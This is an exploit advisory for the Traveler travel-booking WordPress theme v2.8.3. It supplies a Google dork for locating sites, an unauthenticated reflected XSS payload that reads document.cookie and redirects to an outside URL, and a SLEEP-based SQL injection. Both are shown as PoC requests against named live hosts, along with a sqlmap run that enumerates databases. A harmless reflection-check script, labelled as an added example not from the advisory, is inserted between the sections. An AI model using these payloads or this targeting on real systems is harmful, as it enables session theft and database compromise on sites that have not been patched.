[+] Exploit Title: Travel Booking WordPress Theme v2.8.3 - Multiple Vulnerabilities
[+] Google Dork: inurl:/wp-content/themes/traveler/
[+] Date: 2020-06-23
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: ShineTheme [ http://shinetheme.com ]
[+] Software Version: 2.8.3
[+] Software Link: https://themeforest.net/item/traveler-traveltourbooking-wordpress-theme/10822683
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-79, CWE-89



### [ Info: ]

[i] Multiple vulnerabilities were discovered in the Travel Booking (Traveler) theme v2.8.2 and v2.8.3 for WordPress.



### [ Vulnerabilities: ]

[x] Unauthenticated Reflected XSS -> /?child_number=[payload]

[x] SQL Injection -> /?location_id=[payload]



### [ Payloads: ]

[$] " autofocus '-->--!><Input/Autofocus/*/Onfocus=document.location=`https://themeforest.net/user/vladvector`;alert(document.cookie)//>

[$] %20OR%20SLEEP(8)



### [ PoC Unauthenticated Reflected XSS: ]

[!] https://touragency.travelerwp.com/search-on-sidebar/?child_number=%22%20autofocus%20%27--%3E--!%3E%3CInput/Autofocus/*/Onfocus=document.location=`https://themeforest.net/user/vladvector`;alert(document.cookie)//%3E

[!] GET /search-on-sidebar/?child_number=%22%20autofocus%20%27--%3E--!%3E%3CInput/Autofocus/*/Onfocus=document.location=`https://themeforest.net/user/vladvector`;alert(document.cookie)//%3E HTTP/1.1
Host: touragency.travelerwp.com
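
The request above fires the cookie-stealing payload directly from the browser. The script below is an added example, not code from the advisory, the researcher or the theme: it sends a harmless probe (double quote, closing angle bracket, random nonce) to the same child_number parameter and reports whether the page echoes it raw, neutralised (WordPress esc_attr() turns '"' into &quot; and '>' into &gt;), or not at all. Only the raw case reproduces the attribute break-out that the advisory's payload (which also opens with a double quote) relies on. SEARCH_PATH is taken from the PoC URL; the xss<nonce> tag, the function names and the fetch helper are assumptions for illustration.

```python
#!/usr/bin/env python3
"""Reflection check for the child_number parameter (example code, not the advisory's).

Sends a harmless probe instead of the PoC payload and classifies how the page
reflects it. Only an unescaped reflection allows the attribute break-out that
the real payload needs.
"""
import secrets
import sys
import urllib.parse
import urllib.request

# Page from the advisory's PoC; any page rendering the search sidebar should behave the same.
SEARCH_PATH = "/search-on-sidebar/"


def build_probe(nonce=None):
    """Return (probe, nonce). '">' closes a double-quoted attribute and its tag,
    '<xss...>' opens a new one; the nonce makes the reflection unambiguous."""
    nonce = nonce or secrets.token_hex(4)
    return f'"><xss{nonce}>', nonce


def classify_reflection(body, probe, nonce):
    """'unescaped': probe survives verbatim (attribute break-out works).
    'sanitized':  nonce is present but the quote/angle brackets were encoded or stripped.
    'absent':     the parameter is not reflected on this page."""
    if probe in body:
        return "unescaped"
    if nonce in body:
        # e.g. esc_attr() output '&quot;&gt;&lt;xss...&gt;': the nonce is there,
        # the metacharacters are not, so the payload cannot leave the attribute.
        return "sanitized"
    return "absent"


def default_fetch(url, timeout=15):
    """Plain HTTP GET returning the body as text (assumed helper)."""
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0 (reflection-check)"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def check_site(base_url, fetch=default_fetch, nonce=None):
    """Build the probe URL for base_url, fetch it and classify the reflection."""
    probe, nonce = build_probe(nonce)
    query = urllib.parse.urlencode({"child_number": probe})
    body = fetch(base_url.rstrip("/") + SEARCH_PATH + "?" + query)
    return classify_reflection(body, probe, nonce)


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} https://site.example")
    print(check_site(sys.argv[1]))
```

Run it as `python3 check_child_number.py https://site.example`. "unescaped" is the state the PoC exploits; once the theme escapes the parameter the probe comes back as `&quot;&gt;&lt;xss...&gt;` and the script reports "sanitized". The fetch function is injectable so the classifier can be exercised against saved responses without touching a live host.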



### [ PoC SQL Injection: ]

[!] sqlmap --url="https://remap.travelerwp.com/search-rental-full-map/?location_id=1" -dbs --random-agent --time-sec=8

[03:13:37] [INFO] resuming back-end DBMS 'mysql'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: location_id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: location_id=1 OR NOT 1188=1188#

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
    Payload: location_id=1 OR SLEEP(8)
---
[04:17:31] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (Percona fork)
[04:17:31] [INFO] fetching database names
[04:17:31] [INFO] fetching number of databases



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector